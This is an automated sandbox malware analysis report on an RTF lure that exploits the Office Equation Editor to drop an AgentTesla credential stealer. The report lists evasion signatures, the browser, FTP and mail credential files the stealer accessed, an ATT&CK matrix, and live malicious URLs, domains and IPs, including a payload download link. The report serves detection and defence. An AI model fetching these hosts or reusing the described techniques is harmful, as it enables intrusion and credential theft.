              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion:

              barindex
              Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWindow / User API: threadDelayed 9698Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2508Thread sleep time: -300000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe TID: 2304Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe TID: 2784Thread sleep time: -300000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe TID: 2812Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe TID: 2812Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeCode function: 6_2_00403918 LdrInitializeThunk,6_2_00403918
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeMemory written: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeProcess created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeJump to behavior
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349455339.0000000001230000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349455339.0000000001230000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349455339.0000000001230000.00000002.00000001.sdmpBinary or memory string: !Progman
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeQueries volume information: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeQueries volume information: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 BlobJump to behavior

              Stealing of Sensitive Information:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2348944194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2107988603.0000000003C6A000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2349941343.0000000002A84000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2712, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2572, type: MEMORY
              Source: Yara matchFile source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, type: UNPACKEDPE
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: Yara matchFile source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2712, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected AgentTeslaShow sources
              Source: Yara matchFile source: 00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2348944194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2107988603.0000000003C6A000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2349941343.0000000002A84000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2712, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2572, type: MEMORY
              Source: Yara matchFile source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection112Masquerading1OS Credential Dumping2Security Software Discovery11Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion13Input Capture11Query Registry1Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerVirtualization/Sandbox Evasion13SMB/Windows Admin SharesArchive Collected Data11Automated ExfiltrationIngress Tool Transfer12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSProcess Discovery2Distributed Component Object ModelData from Local System2Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsApplication Window Discovery1SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol132Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery114Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 345163 Sample: Pending Orders Statement -4... Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 36 Found malware configuration 2->36 38 Multi AV Scanner detection for submitted file 2->38 40 Yara detected AgentTesla 2->40 42 6 other signatures 2->42 7 EQNEDT32.EXE 11 2->7         started        12 WINWORD.EXE 291 27 2->12         started        process3 dnsIp4 30 cybersng.duckdns.org 172.111.202.41, 49167, 80 BLACKNIGHT-ASIE United States 7->30 32 cy.kl-re.com 7->32 24 C:\Users\user\...\poiuytrewsdfghjklmnbvcx.exe, PE32 7->24 dropped 26 C:\Users\user\AppData\Local\...\boobov[1].exe, PE32 7->26 dropped 52 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->52 14 poiuytrewsdfghjklmnbvcx.exe 12 7->14         started        file5 signatures6 process7 dnsIp8 34 193.239.147.103, 49168, 80 DEDIPATH-LLCUS Brunei Darussalam 14->34 54 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->54 56 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 14->56 58 Injects a PE file into a foreign processes 14->58 18 poiuytrewsdfghjklmnbvcx.exe 4 14->18         started        22 poiuytrewsdfghjklmnbvcx.exe 14->22         started        signatures9 process10 dnsIp11 28 mail.privateemail.com 198.54.122.60, 49169, 49170, 49172 NAMECHEAP-NETUS United States 18->28 44 Tries to steal Mail credentials (via file access) 18->44 46 Tries to harvest and steal ftp login credentials 18->46 48 Tries to harvest and steal browser information (history, passwords, etc) 18->48 50 Installs a global keyboard hook 18->50 signatures12

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Pending Orders Statement -40064778.doc42%VirustotalBrowse
              Pending Orders Statement -40064778.doc48%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack100%AviraHEUR/AGEN.1138205Download File

              Domains

              SourceDetectionScannerLabelLink
              cybersng.duckdns.org0%VirustotalBrowse
              cy.kl-re.com4%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
              http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
              http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
              http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
              http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://DynDns.comDynDNS0%URL Reputationsafe
              http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
              http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
              http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
              http://crl.oces.certifikat.dk/oces.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignCA.crl00%URL Reputationsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              https://sectigo.com/CPS00%URL Reputationsafe
              http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              http://ocsp.sectigo.com00%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
              http://ocsp.entrust.net030%URL Reputationsafe
              http://ocsp.entrust.net030%URL Reputationsafe
              http://ocsp.entrust.net030%URL Reputationsafe
              http://ocsp.entrust.net030%URL Reputationsafe
              http://ca.sia.it/seccli/repository/CRL.der0J0%URL Reputationsafe
              http://ca.sia.it/seccli/repository/CRL.der0J0%URL Reputationsafe
              http://ca.sia.it/seccli/repository/CRL.der0J0%URL Reputationsafe
              http://ca.sia.it/seccli/repository/CRL.der0J0%URL Reputationsafe
              http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
              http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
              http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
              http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html00%URL Reputationsafe
              http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
              http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
              http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
              http://cps.chambersign.org/cps/chambersroot.html00%URL Reputationsafe
              http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.cr0%Avira URL Cloudsafe
              http://www.chambersign.org10%URL Reputationsafe
              http://www.chambersign.org10%URL Reputationsafe
              http://www.chambersign.org10%URL Reputationsafe
              http://www.chambersign.org10%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
              https://ca.sia.it/seccli/repository/CPS/0%Avira URL Cloudsafe
              http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt00%URL Reputationsafe
              http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt00%URL Reputationsafe
              http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt00%URL Reputationsafe
              http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt00%URL Reputationsafe
              http://crl.chambersign.org/publicnotaryroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/publicnotaryroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/publicnotaryroot.crl00%URL Reputationsafe
              http://crl.chambersign.org/publicnotaryroot.crl00%URL Reputationsafe
              http://cy.kl-re.com//power/bo/boobov.exe0%Avira URL Cloudsafe
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
              http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
              http://www.sk.ee/juur/crl/00%URL Reputationsafe
              http://www.sk.ee/juur/crl/00%URL Reputationsafe
              http://www.sk.ee/juur/crl/00%URL Reputationsafe
              http://www.sk.ee/juur/crl/00%URL Reputationsafe
              http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
              http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
              http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
              http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl00%URL Reputationsafe
              http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl00%URL Reputationsafe
              http://193.239.147.103/base/9158412CBF14FB744AFA9F0D01F6CDF2.html0%Avira URL Cloudsafe
              http://duylfM.com0%Avira URL Cloudsafe
              http://www.sk.ee/cps/00%URL Reputationsafe
              http://www.sk.ee/cps/00%URL Reputationsafe
              http://www.sk.ee/cps/00%URL Reputationsafe
              http://www.valicert.com/10%URL Reputationsafe
              http://www.valicert.com/10%URL Reputationsafe
              http://www.valicert.com/10%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              https://xWUrFiDn0aBmFXBFM.net0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              cybersng.duckdns.org
              172.111.202.41
              truetrueunknown
              mail.privateemail.com
              198.54.122.60
              truefalse
                high
                cy.kl-re.com
                unknown
                unknownfalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://cy.kl-re.com//power/bo/boobov.exetrue
                • Avira URL Cloud: safe
                unknown
                http://193.239.147.103/base/9158412CBF14FB744AFA9F0D01F6CDF2.htmlfalse
                • Avira URL Cloud: safe
                unknown
                https://xWUrFiDn0aBmFXBFM.nettrue
                • Avira URL Cloud: safe
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://127.0.0.1:HTTP/1.1poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                low
                http://DynDns.comDynDNSpoiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://crl.oces.certifikat.dk/oces.crl0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://fedir.comsign.co.il/crl/ComSignCA.crl0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://sectigo.com/CPS0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://crl.chambersign.org/chambersroot.crl0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://crl.entrust.net/server1.crl0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpfalse
                  high
                  http://ocsp.sectigo.com0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349668008.00000000027AA000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hapoiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://ocsp.entrust.net03poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://ca.sia.it/seccli/repository/CRL.der0Jpoiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353089225.0000000006498000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.certicamara.com/dpc/0Zpoiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2358404346.0000000008390000.00000004.00000001.sdmpfalse
                    high
                    http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://cps.chambersign.org/cps/chambersroot.html0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crpoiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.chambersign.org1poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353099899.00000000064A9000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.diginotar.nl/cps/pkioverheid0poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
